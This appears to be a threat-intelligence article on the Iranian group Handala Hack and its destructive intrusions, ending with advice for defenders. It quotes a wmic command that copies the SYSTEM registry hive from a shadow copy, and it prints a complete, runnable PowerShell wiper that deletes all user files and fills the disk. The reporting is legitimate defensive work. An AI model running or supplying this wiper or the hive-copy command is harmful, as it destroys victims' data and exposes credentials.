Manual Malice: How Handala Hack Weaponizes AI Wipers and NetBird for Rapid Network Annihilation

The Iranian syndicate designated “Handala Hack”—a collective inextricably intertwined with the Void Manticore cluster and the Iranian Ministry of Intelligence and Security (MOIS)—persists in operating via a profoundly brutal, albeit structurally unpretentious, choreography: secure ingress, rapidly entrench within the network perimeter, manually traverse the infrastructure, and simultaneously detonate a multiplicity of data annihilation vectors. In a nascent forensic dissection, investigators have illuminated not merely the syndicate’s orthodox repertoire, but several novel idiosyncrasies. Prominent among these are the weaponization of NetBird to forge clandestine tunnels within compromised enclaves, alongside a PowerShell-driven wiper bearing the unmistakable hallmarks of artificial intelligence orchestration within its source code.

The moniker “Handala Hack” does not denote a solitary, ephemeral campaign, but rather serves as one of the public visages of Void Manticore. This overarching architecture possesses auxiliary, well-documented personas—notably “Karma” and “Homeland Justice.” It was precisely Homeland Justice that was protracted utilized in kinetic operations against Albania, relentlessly targeting state apparatuses and the telecommunications sector. Handala, conversely, was historically synonymous with offensives directed against Israeli entities; however, its geographical theater is no longer confined to the Levant. Forensic analysts explicitly document incursions against American conglomerates, conspicuously including the medical technology leviathan Stryker.

According to the dossier, the group’s Tactics, Techniques, and Procedures (TTPs) have remained remarkably static from 2024 through 2026. Void Manticore resolutely champions manual navigation within the besieged network, leveraging commercial and ubiquitous utilities, pre-fabricated wipers, publicly accessible tools for data obliteration and cryptographic locking, alongside subterranean services to secure initial ingress and procure malicious instrumentation. The cardinal nuance here lies elsewhere: even devoid of profoundly exotic stratagems, the syndicate achieves catastrophic destructive efficacy. This triumph is born of blistering operational celerity, the ruthless exploitation of privileged credentials, and a simultaneous, multi-vector assault.

Investigators postulate a profound intertwining among the personas of Handala, Karma, and Homeland Justice. Incidents attributed to these disparate fronts exhibited homologous tactical maneuvers and shared contiguous segments of source code within their respective wipers. Furthermore, Karma and Homeland Justice demonstrated a cooperative synergy with an auxiliary Iranian cluster, “Scarred Manticore.” In specific scenarios, the operational tableau was exquisitely revealing: internal missives and digital graffiti etched by the malefactors pointed unequivocally to Karma, yet the exfiltrated telemetry was ultimately disseminated under the Handala banner. The authors hypothesize that Karma and Handala may have originally functioned as dual, autonomous squadrons or bifurcated branches within a singular architecture, subsequently amalgamating beneath the more conspicuous brand of Handala. This theory is tangentially corroborated by Karma’s evaporation from the public theater and Handala’s absolute dominion over recent operations.

(From novice to Chief Information Security Officer: an indispensable compendium of vital symposiums. Initiate your ascendancy.)

Open-source intelligence reveals profound intersections between Void Manticore’s kinetic activity and operations historically attributed to the MOIS’s internal security directorate—specifically, the anti-terrorism vanguard orchestrated by Seyed Yahya Hosseini Panjaki. Forensic savants note that Panjaki, according to open-source dispatches, perished during the nascent stages of Israeli kinetic strikes against Iran in early March 2026. While this revelation does not directly alter the technical anatomy of their attacks, it profoundly contextualizes the cluster within the broader Iranian geopolitical theater.

Handala’s initial ingress, according to the authors’ observations, is frequently architected around third-party contractors, IT syndicates, and service providers. The strategic logic is elegantly simple: a singular intermediary serves as a conduit to simultaneously breach a multitude of sovereign networks. The syndicate has long demonstrated a voracious appetite for credentials, particularly weaponizing compromised VPN authentications. In recent months, investigators have detected hundreds of authentication endeavors and password brute-forcing campaigns directed against enterprise VPN infrastructures, activities definitively tethered to Handala’s operational architecture. Such connections frequently originated from commercial VPN nodes, whilst the source telemetry routinely betrayed default Windows hostnames akin to DESKTOP-XXXXXX or WIN-XXXXXX.

Following the severing of the Iranian internet in January, the operational tableau subtly mutated. Investigators detected homologous kinetic activity emanating from IP coordinates attributed to Starlink, noting that this pattern has stubbornly persisted. Concurrently, the syndicate suffered a precipitous degradation in operational discipline. Whereas operators previously labored to shroud their traffic behind commercial VPNs, striving to obscure their true provenance, subsequent episodes betrayed direct connections originating from sovereign Iranian IP coordinates. Historically, when orchestrating strikes against Israeli targets, the group customarily egressed via the 169.150.227.X subnet. Occasionally, this cryptographic masquerade fractured, exposing connections from either Iranian domains or Virtual Private Servers (VPS). The investigators surmise that following the eruption of martial hostilities, sustaining their antecedent standard of obfuscation became profoundly arduous. In isolated instances, malefactors successfully egressed via the Israeli node 146.185.219[.]235, which the authors assess was similarly tethered to a VPN service, albeit deviating from their historical infrastructure.

A distinctly documented scenario details an instance wherein network ingress—presumably weaponized during the subsequent annihilation phase—was secured months prior to the kinetic strike. Investigators posit that this protracted, early access bestowed upon the malefactors the luxury to deeply entrench, harvest requisite credentials, and crucially, ascend to the zenith of “Domain Admin” privileges within the Active Directory architecture. In the agonizing hours preceding Handala’s destructive crescendo, analysts assess that the syndicate systematically verified the viability of their access and rigorously tested authentication utilizing the purloined credentials.

A fraction of this pre-strike choreography deviated subtly from the syndicate’s orthodox signature; consequently, the authors cautiously stipulate that not every maneuver can be unequivocally attributed to Handala with absolute certainty. Nevertheless, this sequence harbored activities quintessential to attack preparation: the draconian disabling of Windows Defender armaments, rigorous internal reconnaissance, credential exfiltration, and endeavors to retrieve auxiliary payloads from an isolated command-and-control server residing at 107.189.19[.]52.

Subsequently, the malefactors escalated to credential exfiltration via a multiplicity of vectors. The dossier chronicles the dumping of the LSASS process via comsvcs.dll utilizing rundll32.exe. LSASS operates as a foundational Windows systemic process, its memory architecture harboring credentials and intelligence vital for protracted lateral movement. Concurrently, the assailants exfiltrated profoundly sensitive registry hives, notably encompassing HKLM. Furthermore, ADRecon was ignited within the infrastructure under the guise of dra.ps1. This constitutes a formidable PowerShell framework engineered for reconnaissance within Active Directory enclaves: it empowers the harvesting of intelligence concerning users, groups, trust architectures, computational hosts, and administrative hierarchies. It is precisely at this juncture, the investigators deduce, that the malefactors likely usurped the Domain Admin privileges subsequently weaponized in Handala’s wiping operations.

The dossier also illuminates a captured command fragment, leveraged to clone telemetry from the volume shadow copy:

wmic.exe /node:[REDACTED_HOSTNAME] /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system c:\users\public"

Upon securing supreme access and privileges, the syndicate transitioned to lateral movement across the network. Here, Handala, according to the investigators, persists in operating predominantly via manual orchestration. Their primary conduit for traversing disparate systems is the Remote Desktop Protocol (RDP). Via this ubiquitous protocol, operators seamlessly authenticate into compromised hosts, navigating the environment with the impunity of an orthodox administrator. However, should critical machines prove inaccessible directly from the exterior, a profoundly more intriguing instrument was deployed: NetBird.

NetBird operates as a legitimate architectural platform for forging secure, private mesh networks predicated upon a zero-trust paradigm. Simply articulated, it facilitates the tethering of disparate machines such that their communion traverses a cryptographically secured tunnel, rendering them utterly independent of orthodox, direct network visibility. For an adversary, this presents an exquisite utility: if a singular host has capitulated, this instrument can be weaponized to weave a sovereign, private network deep within the perimeter, granting unimpeded access to auxiliary nodes. In the chronicled incident, NetBird was installed manually. Operators authenticated into compromised systems via RDP, launched the native browser, and downloaded the client directly from the official NetBird repository. Following its installation across multiple internal hosts, they secured a formidable layer of internal connectivity, empowering them to operate with terrifying celerity. In one specific incident, investigators observed a minimum of five distinct machines, entirely subjugated by the assailants, operating synchronously within the environment.

The destructive crescendo manifested with terrifying brutality. To inflict absolute, maximal devastation, the syndicate simultaneously deployed four disparate wiping techniques in parallel. This redundancy was not orchestrated for mere aesthetic elegance. Should one methodology falter or face partial interdiction, the auxiliary vectors would relentlessly sustain the data annihilation. To proliferate these diverse wipers across the network, the malefactors weaponized Group Policy within Active Directory. This constitutes an immensely potent instrument within the corporate Windows theater: it grants the capacity to centrally and instantaneously distribute scripts and directives across a vast multitude of machines.

The inaugural component was christened the “Handala Wiper” by investigators. In certain instances, the executable masqueraded as handala.exe. This wiper was propagated via a scheduled task, birthed through logon scripts embedded within Group Policy. The handala.bat script ignited dual components: the executable and a PowerShell script. The investigators explicitly underscore a fascinating architectural nuance: the executable itself was launched remotely directly from the domain controller, scrupulously avoiding any physical inscription upon the disks of the besieged machines. This sophisticated artifice profoundly confounds post-incident detection and forensic dissection. Within the system, the venomous code overwrote file contents and weaponized wiping techniques targeting the Master Boot Record (MBR). The corruption of the MBR not merely renders the system utterly inoperable, but monumentally complicates any endeavor at restoration.

During the terminal phase, the operators unleashed a final, bespoke component: a PowerShell wiper. It, too, was disseminated via Group Policy logon scripts, thereby empowering it to rapidly engulf a multitude of machines. Its operational logic is brutally simple, yet catastrophic: the script recursively enumerates all files nested within user directories and ruthlessly eradicates them. The investigators assess that, judging by its architectural structure and exhaustive annotations, this PowerShell script was highly likely authored with the assistance of artificial intelligence. In its final act of defiance, the script littered the logical drives with the image handala.gif, leaving an indelible, visual monument to the attack.

The following represents the complete fragment of the PowerShell code incorporated within the investigators’ dossier:

$usersFolder = 'C:\Users'
   
  # Ensure the folder exists
  if (Test-Path $usersFolder) {
      # Get all items in C:\Users, but not the Users folder itself
      $items = Get-ChildItem -Path $usersFolder -Recurse
   
      # Remove each item (files and subfolders) inside C:\Users
      foreach ($item in $items) {
          try {
              Remove-Item -Path $item.FullName -Recurse -Force -ErrorAction Stop
          } catch {
              Write-Host "Could not delete: $($item.FullName)"
          }
      }
  }
   
   
   
  $sourceFile = '\\[REDACTED]\SYSVOL\[REDACTED]\scripts\Administtration\install\handala.rar'
  $destinationFolder = 'C:\users'
   
   
  if (!(Test-Path $destinationFolder)) {
      New-Item -ItemType Directory -Path $destinationFolder | Out-Null
  }
   
  $driveLetter = (Split-Path $destinationFolder -Qualifier).TrimEnd(':','\')
   
  $i = 0
   
  while ((Get-PSDrive $driveLetter).Free -gt (Get-Item $sourceFile).Length) {
      Copy-Item $sourceFile "$destinationFolder\Handala_$i.gif"
      $i++
  }

Beyond their bespoke wipers, the syndicate also weaponized entirely legitimate software—specifically, VeraCrypt. Customarily, VeraCrypt is venerated as an instrument for the cryptographic encryption of disks and containers, utilized to fortify data privacy. In the Handala offensive, it was transmuted into an auxiliary layer of annihilation. An operator would authenticate to a host via RDP, download VeraCrypt from its official repository using the native browser, and subsequently execute the encryption of the systemic drives. For the victim, this represents a profoundly agonizing reality: even if a fraction of the wipers functioned imperfectly or were intercepted, the cryptographically sealed drives remain utterly inaccessible, monumentally complicating any restorative endeavor.

In certain scenarios, the syndicate entirely eschewed complexity, resorting to the manual deletion of telemetry. Investigators chronicled episodes wherein operators authenticated to machines via RDP, manually selected files, and simply commanded their deletion. In a homologous fashion, they eradicated virtual machines directly from the virtualization hypervisor. This tactic appears almost primitively simplistic, yet under the auspices of usurped privileges and absolute dominion over the environment, it proves devastatingly effective. Furthermore, investigators observed this homologous behavior not merely within the incidents themselves, but also vividly displayed within video recordings and exfiltrated materials publicly disseminated by Handala.

The overarching conclusion of the dossier is starkly direct. Handala, alongside its tethered Void Manticore cluster, does not predicate its success upon esoteric, hyper-advanced technological sleight of hand. Their operational paradigm is anchored in rudimentary, yet devastatingly kinetic, maneuvers: purloined credentials, blistering network ingress, manual infrastructural traversal, cryptographic tunneling via legitimate utilities, the weaponization of Group Policy for mass proliferation, and a synchronous multiplicity of data annihilation vectors. It is precisely for this reason that defending against such operations remains profoundly orthodox: the more hermetically sealed the foundational access vectors are, and the more rapidly manual anomaly detection triggers within the network, the narrower the assailants’ temporal window to reach their destructive crescendo.

In their strategic counsel to defenders, the investigators preeminently advise the draconian enforcement of Multi-Factor Authentication (MFA), particularly concerning remote ingress and privileged accounts. Profound vigilance must be directed toward anomalous authentication telemetry: logins originating from sovereign territories where the organization historically possesses no footprint, inaugural logins during profoundly unusual temporal windows, cascading sequences of failed attempts culminating in a triumphant login, the registration of nascent hardware, anomalous volumes of data exfiltration during a VPN session, and authentication routed through nascent Autonomous System Numbers (ASNs) or hosting purveyors.

Furthermore, the authors vehemently recommend the interdiction of access originating from high-risk geographic territories and infrastructures. The dossier explicitly advocates for the absolute blockade of inbound connections emanating from Iran at the perimeter and across all remote access services, barring an unequivocally validated business imperative. A homologous edict applies to Starlink IP ranges, which, according to the investigators’ observations, have already been weaponized by Iranian operatives. Should an absolute blockade prove unfeasible, they propose, at a minimum, the implementation of conditional access protocols, the draconian fortification of authentication prerequisites, and the dedicated, granular monitoring of such network ranges.

An auxiliary, critical block of counsel concerns RDP. They advocate for its maximal restriction, rigorous fortification, and absolute termination wherever it lacks a tangible, operational necessity. It is profoundly beneficial to actively hunt for RDP connections originating from hosts bearing default Windows nomenclatures akin to DESKTOP-XXXXXX or WIN-XXXXXXXX, most acutely if such sessions ignite outside orthodox operational hours. Ultimately, vigilant surveillance must be maintained over the deployment of Potentially Unwanted Programs (PUPs): remote administration and monitoring architectures, VPN clients akin to NetBird, and cryptographic tunneling utilities, conspicuously including SSH for Windows.

The Handala narrative vividly illustrates a profoundly unsettling, yet vital, truth: orchestrating a colossal, catastrophic incident does not universally demand a labyrinthine, next-generation implant. Frequently, all that is required is purloined VPN access, Domain Admin privileges, Remote Desktop Protocol, a handful of legitimate utilities, and a cadre of operators prepared to rapidly and manually carve their way through the network. It is precisely this reality that renders such campaigns an existential peril, not merely for high-profile geopolitical targets, but for pedestrian enterprises whose foundational hygiene regarding remote access and internal administration remains perilously anchored to antiquated assumptions.